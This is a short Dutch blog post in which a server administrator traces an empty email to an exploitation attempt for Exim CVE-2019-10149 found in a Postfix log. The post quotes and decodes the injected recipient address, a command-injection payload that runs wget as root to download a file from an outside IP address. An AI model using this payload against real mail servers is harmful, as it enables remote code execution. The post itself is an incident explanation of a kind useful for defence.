Vandaag opeens een raar mailtje in mijn inbox. Een compleet lege mail, zonder tekst en zonder afzender. Op zich niets aan de hand, maar omdat het raar is dat alles leeg is, ben ik toch op onderzoek uitgegaan om te zien wat hier speelt. In de log was het vrij snel terug te vinden:

Jun 25 17:41:37 echo postfix/local[7859]: EFE5D2D4141: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mailserver>, relay=local, delay=0.39

Wat vooral opvalt is de tekst achter to. Normaal gesproken staat daar een emailadres. Maar in dit geval staat daar een reeks vreemde tekens. Alhoewel, een deel wel opvalt. Zoals het woordje wget. Deze string is ge-encodeerd. Als we dit decoderen (2F = /, x = spatie, 22 = quotes), dan staat er dit:

root+${run{/bin/sh t-ct "wget 65.181.120.163/stfinracu"}}

In mailservers wordt de + gebruikt om sub-addressing mogelijk te maken. Een truukje dus om meerdere emailadressen te kunnen gebruiken die allemaal in dezelfde mailbox terechtkomen. In Gmail is dat ook mogelijk op deze manier.

Deze regel is natuurlijk bedoeld om als user root het commando wget uit te laten voeren en een bestand op te halen van de remote server. Toen ik keek, was het bestand al weg van deze server. Waarschijnlijk wordt het snel opgeruimd als blijkt dat een server niet vatbaar is.

Een zoekopdracht leert dat ongeveer 2 weken geleden een vulnerability bekend is gemaakt voor Exim, CVE-2019-10149. Ook wel bekend als The Return of the WIZard. Nu gebruik ik geen Exim, dus heb hier geen last van. Maar het toont wel aan hoe slim dit soort aanvallen in elkaar zitten. De technische uitleg van deze aanval is interessant om te lezen.